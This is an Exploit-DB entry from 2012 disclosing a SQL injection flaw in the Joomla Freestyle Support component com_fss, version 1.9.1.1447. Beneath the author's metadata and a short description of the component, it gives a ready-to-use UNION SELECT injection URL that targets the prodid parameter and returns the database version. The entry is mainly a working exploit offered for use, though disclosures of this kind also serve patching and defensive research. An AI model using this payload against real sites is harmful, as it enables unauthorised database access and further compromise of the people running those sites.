Joomla! Component com_fss 1.9.1.1447 - SQL Injection

EDB-ID:

22097

CVE:


EDB Verified:

Author:

D4NB4R

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-10-19

Vulnerable App: 
 Exploit Title: Joomla Freestyle Support com_fss sqli

 Dork: N/A
 
 Date: [17-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://freestyle-joomla.com
 
 Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
 
 License: Commercial

 Download: http://freestyle-joomla.com/fssdownloads
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion joomla component: 

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in 


Exploit: 
    

    SQL : SQL injection

           http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
    
  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services